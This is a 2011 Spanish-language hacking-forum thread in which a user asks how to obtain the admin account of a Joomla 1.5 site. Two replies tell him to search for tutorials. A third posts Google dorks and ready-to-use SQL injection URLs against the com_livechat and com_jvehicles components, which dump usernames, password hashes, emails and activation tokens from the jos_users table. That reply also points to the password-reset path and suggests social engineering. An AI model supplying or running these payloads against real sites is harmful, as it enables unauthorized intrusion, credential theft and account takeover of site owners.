Sólo texto | Texto con Imágenes

Underc0de

Foros Generales => Dudas y pedidos generales => Mensaje iniciado por: WhitePag en Agosto 10, 2011, 02:20:29 AM

Título: [SOLUCIONADO] Ayuda , Sacar admin de Joomla 1.5
Publicado por: WhitePag en Agosto 10, 2011, 02:20:29 AM
Buenas , tengo una duda , como puedo hacer para sacar el admin de una pagina que tiene joomla 1.5? mediante sql o como?
si me pueden dejar un link o tuto mucho mejor
Muchas Gracias!
Título: Re:Ayuda , Sacar admin de Joomla 1.5
Publicado por: RandomSoft en Agosto 10, 2011, 10:07:22 AM
 ??? La manera más facil es que se lo pidas al Administrador  ::) al menos que te tomes el tiempo de buscar en San Google o en el Foro algunos Manuales o VideoTutoriales, te recomiendo buscar los VideoTutoriales de Xt3mP.
Título: Re:Ayuda , Sacar admin de Joomla 1.5
Publicado por: Fakedo0r en Agosto 10, 2011, 01:00:42 PM
Primero aprende a usar el Google. Como dice el RandomSoft, hay muchos tutoriales sobre el tema, tan solo buscalos.

Título: Re:Ayuda , Sacar admin de Joomla 1.5
Publicado por: Harakiri en Agosto 11, 2011, 06:57:49 PM
No tienes permitido ver enlaces. Registrate o Entra a tu cuenta
depende men que bug tenga mira aqui te doy algo que te ayudaria

Código [Seleccionar]
Dork: allinurl:index.php?option=com_livechat

Exploit: /administrator/components/com_livechat/getSavedChatRooms.php?chat=0&last=1%20union%20select%201,unhex%28hex%28concat%28username,0x3a,password%29%29%29,3%20from%20jos_users

Dork: allinurl:index.php?option=com_livechat

Exploit: /index.php?option=com_user&view=reset&layout=confirm



--------------------------------------------------------------------

Dorks : inurl:option=com_jvehicles inurl:com_jvehicles

######### Exploit nr 1 ############

index.php?option=com_jvehicles&task=agentlisting&aid=62 /**/ AND /**/ 1=0 /**/ UNION /**/ ALL /**/ SELECT /**/ 1, /**/ 2, /**/ version(), /**/ 4, /**/ group_concat(username,0x3a,email), /**/ 6, /**/ 7, /**/ 8, /**/ 9, /**/ 10, /**/ 11, /**/ 12, /**/ 13, /**/ 14, /**/ 15, /**/ 16, /**/ 17, /**/ 18, /**/ 19, /**/ 20, /**/ 21, /**/ 22, /**/ 23, /**/ 24, /**/ 25, /**/ 26, /**/ 27, /**/ 28, /**/ 29, /**/ 30, /**/ 31, /**/ 32 from+jos_users--

######## Exploit Nr 2 ############

index.php?option=com_jvehicles&task=agentlisting&aid=62 /**/ AND /**/ 1=0 /**/ UNION /**/ ALL /**/ SELECT /**/ 1, /**/ 2, /**/ version(), /**/ 4, /**/ group_concat(username,0x3a,activation), /**/ 6, /**/ 7, /**/ 8, /**/ 9, /**/ 10, /**/ 11, /**/ 12, /**/ 13, /**/ 14, /**/ 15, /**/ 16, /**/ 17, /**/ 18, /**/ 19, /**/ 20, /**/ 21, /**/ 22, /**/ 23, /**/ 24, /**/ 25, /**/ 26, /**/ 27, /**/ 28, /**/ 29, /**/ 30, /**/ 31, /**/ 32 from+jos_users--


/index.php?option=com_user&view=reset

No creo que le sirvan porque los dos estan basados en componentes especificos (com_livechat, com_jvehicles) y no en vulnerabilidades nativas (que son muy escazas por no decir cada ves mas imposibles de encontrar)

De todas maneras si es buena idea que busques los componentes instalados y trates inyecciones varias y tal... si no quizas puedas sacar el adm con ingenieria social.

=) saludos
Sólo texto | Texto con Imágenes